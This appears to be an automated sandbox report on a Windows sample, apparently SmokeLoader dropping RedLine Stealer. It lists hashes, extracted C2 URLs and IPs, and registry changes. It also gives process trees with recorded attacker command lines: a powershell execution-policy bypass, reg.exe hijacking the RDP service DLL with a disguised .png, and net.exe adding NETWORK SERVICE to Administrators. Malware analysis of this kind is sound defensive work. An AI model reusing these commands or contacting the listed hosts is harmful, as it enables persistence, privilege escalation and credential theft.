Analysis
max time kernel
150s
max time network
150s
platform
windows10_x64
resource
win10-en-20211208
submitted
10-12-2021 00:38
Static task
static1
Behavioral task
behavioral1
Sample
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Resource
win10-en-20211208
General
-
Target
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
-
Size
218KB
-
MD5
d23a607770f2dc224e7026ef676c0604
-
SHA1
c5f14029dec233da0e6b9b884a176445bdd2deec
-
SHA256
2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68
-
SHA512
6b2204da4961c05be17186b03ea0bf2dddb1286b32b80c86439e777223ec8e4529e5403eab26450d1293fe3ebd7b4afd28c8b64d95daac1cfc520cb6a3b41e8e
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
195.133.47.114:38627
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\B0DD.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\B0DD.exe | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
flow | pid | process
93 | 3596 | powershell.exe
95 | 3596 | powershell.exe
96 | 3596 | powershell.exe
97 | 3596 | powershell.exe
99 | 3596 | powershell.exe
101 | 3596 | powershell.exe
103 | 3596 | powershell.exe
105 | 3596 | powershell.exe
107 | 3596 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
pid | process
1164 | B0DD.exe
1412 | C1E6.exe
4040 | 49D.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource | yara_rule
\Windows\Branding\mediasrv.png | upx
\Windows\Branding\mediasvc.png | upx
-
Deletes itself 1 IoCs
Processes:
pid | process
2880
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
1980
1980
-
Drops file in Program Files directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
-
Drops file in Windows directory 19 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI941B.tmp | powershell.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_eiori2sj.t3c.ps1 | powershell.exe
File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI930F.tmp | powershell.exe
File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File created | C:\Windows\branding\mediasvc.png | powershell.exe
File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI942D.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dhgoqqe1.ey1.psm1 | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI940A.tmp | powershell.exe
File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI942C.tmp | powershell.exe
File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = af82d12985ecd701 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | powershell.exe
Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | powershell.exe
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 96 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 97 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 99 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 95 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
2760 | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
2760 | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
2880 (listed 62 times, with no process name recorded)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2880
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
628
628
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid | process
2760 | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeShutdownPrivilege | 2880
Token: SeCreatePagefilePrivilege | 2880
Token: SeDebugPrivilege | 1264 | powershell.exe
Token: SeDebugPrivilege | 1812 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1812 | powershell.exe
Token: SeSecurityPrivilege | 1812 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1812 | powershell.exe
Token: SeLoadDriverPrivilege | 1812 | powershell.exe
Token: SeSystemProfilePrivilege | 1812 | powershell.exe
Token: SeSystemtimePrivilege | 1812 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1812 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1812 | powershell.exe
Token: SeCreatePagefilePrivilege | 1812 | powershell.exe
Token: SeBackupPrivilege | 1812 | powershell.exe
Token: SeRestorePrivilege | 1812 | powershell.exe
Token: SeShutdownPrivilege | 1812 | powershell.exe
Token: SeDebugPrivilege | 1812 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1812 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1812 | powershell.exe
Token: SeUndockPrivilege | 1812 | powershell.exe
Token: SeManageVolumePrivilege | 1812 | powershell.exe
Token: 33 | 1812 | powershell.exe
Token: 34 | 1812 | powershell.exe
Token: 35 | 1812 | powershell.exe
Token: 36 | 1812 | powershell.exe
Token: SeDebugPrivilege | 3772 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3772 | powershell.exe
Token: SeSecurityPrivilege | 3772 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3772 | powershell.exe
Token: SeLoadDriverPrivilege | 3772 | powershell.exe
Token: SeSystemProfilePrivilege | 3772 | powershell.exe
Token: SeSystemtimePrivilege | 3772 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3772 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3772 | powershell.exe
Token: SeCreatePagefilePrivilege | 3772 | powershell.exe
Token: SeBackupPrivilege | 3772 | powershell.exe
Token: SeRestorePrivilege | 3772 | powershell.exe
Token: SeShutdownPrivilege | 3772 | powershell.exe
Token: SeDebugPrivilege | 3772 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3772 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3772 | powershell.exe
Token: SeUndockPrivilege | 3772 | powershell.exe
Token: SeManageVolumePrivilege | 3772 | powershell.exe
Token: 33 | 3772 | powershell.exe
Token: 34 | 3772 | powershell.exe
Token: 35 | 3772 | powershell.exe
Token: 36 | 3772 | powershell.exe
Token: SeDebugPrivilege | 2140 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2140 | powershell.exe
Token: SeSecurityPrivilege | 2140 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2140 | powershell.exe
Token: SeLoadDriverPrivilege | 2140 | powershell.exe
Token: SeSystemProfilePrivilege | 2140 | powershell.exe
Token: SeSystemtimePrivilege | 2140 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2140 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2140 | powershell.exe
Token: SeCreatePagefilePrivilege | 2140 | powershell.exe
Token: SeBackupPrivilege | 2140 | powershell.exe
Token: SeRestorePrivilege | 2140 | powershell.exe
Token: SeShutdownPrivilege | 2140 | powershell.exe
Token: SeDebugPrivilege | 2140 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2140 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2140 | powershell.exe
Token: SeUndockPrivilege | 2140 | powershell.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid | process
2880
2880
-
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid | process
2880
2880
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 2880 wrote to memory of 1164 | 2880 | | B0DD.exe
PID 2880 wrote to memory of 1164 | 2880 | | B0DD.exe
PID 2880 wrote to memory of 1164 | 2880 | | B0DD.exe
PID 2880 wrote to memory of 1412 | 2880 | | C1E6.exe
PID 2880 wrote to memory of 1412 | 2880 | | C1E6.exe
PID 2880 wrote to memory of 1412 | 2880 | | C1E6.exe
PID 2880 wrote to memory of 4040 | 2880 | | 49D.exe
PID 2880 wrote to memory of 4040 | 2880 | | 49D.exe
PID 4040 wrote to memory of 1264 | 4040 | 49D.exe | powershell.exe
PID 4040 wrote to memory of 1264 | 4040 | 49D.exe | powershell.exe
PID 1264 wrote to memory of 2032 | 1264 | powershell.exe | csc.exe
PID 1264 wrote to memory of 2032 | 1264 | powershell.exe | csc.exe
PID 2032 wrote to memory of 1984 | 2032 | csc.exe | cvtres.exe
PID 2032 wrote to memory of 1984 | 2032 | csc.exe | cvtres.exe
PID 1264 wrote to memory of 2320 | 1264 | powershell.exe | csc.exe
PID 1264 wrote to memory of 2320 | 1264 | powershell.exe | csc.exe
PID 2320 wrote to memory of 2596 | 2320 | csc.exe | cvtres.exe
PID 2320 wrote to memory of 2596 | 2320 | csc.exe | cvtres.exe
PID 1264 wrote to memory of 1812 | 1264 | powershell.exe | powershell.exe
PID 1264 wrote to memory of 1812 | 1264 | powershell.exe | powershell.exe
PID 1264 wrote to memory of 3772 | 1264 | powershell.exe | powershell.exe
PID 1264 wrote to memory of 3772 | 1264 | powershell.exe | powershell.exe
PID 1264 wrote to memory of 2140 | 1264 | powershell.exe | powershell.exe
PID 1264 wrote to memory of 2140 | 1264 | powershell.exe | powershell.exe
PID 1264 wrote to memory of 2804 | 1264 | powershell.exe | reg.exe
PID 1264 wrote to memory of 2804 | 1264 | powershell.exe | reg.exe
PID 1264 wrote to memory of 1120 | 1264 | powershell.exe | reg.exe
PID 1264 wrote to memory of 1120 | 1264 | powershell.exe | reg.exe
PID 1264 wrote to memory of 3756 | 1264 | powershell.exe | reg.exe
PID 1264 wrote to memory of 3756 | 1264 | powershell.exe | reg.exe
PID 1264 wrote to memory of 1476 | 1264 | powershell.exe | net.exe
PID 1264 wrote to memory of 1476 | 1264 | powershell.exe | net.exe
PID 1476 wrote to memory of 2504 | 1476 | net.exe | net1.exe
PID 1476 wrote to memory of 2504 | 1476 | net.exe | net1.exe
PID 1264 wrote to memory of 1468 | 1264 | powershell.exe | cmd.exe
PID 1264 wrote to memory of 1468 | 1264 | powershell.exe | cmd.exe
PID 1468 wrote to memory of 1780 | 1468 | cmd.exe | cmd.exe
PID 1468 wrote to memory of 1780 | 1468 | cmd.exe | cmd.exe
PID 1780 wrote to memory of 2220 | 1780 | cmd.exe | net.exe
PID 1780 wrote to memory of 2220 | 1780 | cmd.exe | net.exe
PID 2220 wrote to memory of 2216 | 2220 | net.exe | net1.exe
PID 2220 wrote to memory of 2216 | 2220 | net.exe | net1.exe
PID 1264 wrote to memory of 700 | 1264 | powershell.exe | cmd.exe
PID 1264 wrote to memory of 700 | 1264 | powershell.exe | cmd.exe
PID 700 wrote to memory of 1268 | 700 | cmd.exe | cmd.exe
PID 700 wrote to memory of 1268 | 700 | cmd.exe | cmd.exe
PID 1268 wrote to memory of 3684 | 1268 | cmd.exe | net.exe
PID 1268 wrote to memory of 3684 | 1268 | cmd.exe | net.exe
PID 3684 wrote to memory of 1940 | 3684 | net.exe | net1.exe
PID 3684 wrote to memory of 1940 | 3684 | net.exe | net1.exe
PID 3132 wrote to memory of 2212 | 3132 | cmd.exe | net.exe
PID 3132 wrote to memory of 2212 | 3132 | cmd.exe | net.exe
PID 2212 wrote to memory of 1548 | 2212 | net.exe | net1.exe
PID 2212 wrote to memory of 1548 | 2212 | net.exe | net1.exe
PID 3228 wrote to memory of 1768 | 3228 | cmd.exe | net.exe
PID 3228 wrote to memory of 1768 | 3228 | cmd.exe | net.exe
PID 1768 wrote to memory of 3128 | 1768 | net.exe | net1.exe
PID 1768 wrote to memory of 3128 | 1768 | net.exe | net1.exe
PID 1404 wrote to memory of 3428 | 1404 | cmd.exe | net.exe
PID 1404 wrote to memory of 3428 | 1404 | cmd.exe | net.exe
PID 3428 wrote to memory of 3812 | 3428 | net.exe | net1.exe
PID 3428 wrote to memory of 3812 | 3428 | net.exe | net1.exe
PID 1840 wrote to memory of 4076 | 1840 | cmd.exe | net.exe
PID 1840 wrote to memory of 4076 | 1840 | cmd.exe | net.exe
Processes
-
Depth 1: C:\Users\Admin\AppData\Local\Temp\2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
Depth 1: C:\Users\Admin\AppData\Local\Temp\B0DD.exe
Command line: C:\Users\Admin\AppData\Local\Temp\B0DD.exe
- Executes dropped EXE
Depth 1: C:\Users\Admin\AppData\Local\Temp\C1E6.exe
Command line: C:\Users\Admin\AppData\Local\Temp\C1E6.exe
- Executes dropped EXE
Depth 1: C:\Users\Admin\AppData\Local\Temp\49D.exe
Command line: C:\Users\Admin\AppData\Local\Temp\49D.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Depth 3: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.cmdline"
- Suspicious use of WriteProcessMemory
Depth 4: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FE3.tmp" "c:\Users\Admin\AppData\Local\Temp\qp0crqtk\CSC45ED1FB13AA1429D92B43D88258E46CE.TMP"
Depth 3: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.cmdline"
- Suspicious use of WriteProcessMemory
Depth 4: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25DE.tmp" "c:\Users\Admin\AppData\Local\Temp\n4ty3n35\CSCDDE27C93210C430DAAB0D0F2814DD1C5.TMP"
Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious use of AdjustPrivilegeToken
Depth 3: C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
Depth 3: C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
- Modifies registry key
Depth 3: C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
Depth 3: C:\Windows\system32\net.exe
Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- Suspicious use of WriteProcessMemory
Depth 4: C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
Depth 3: C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
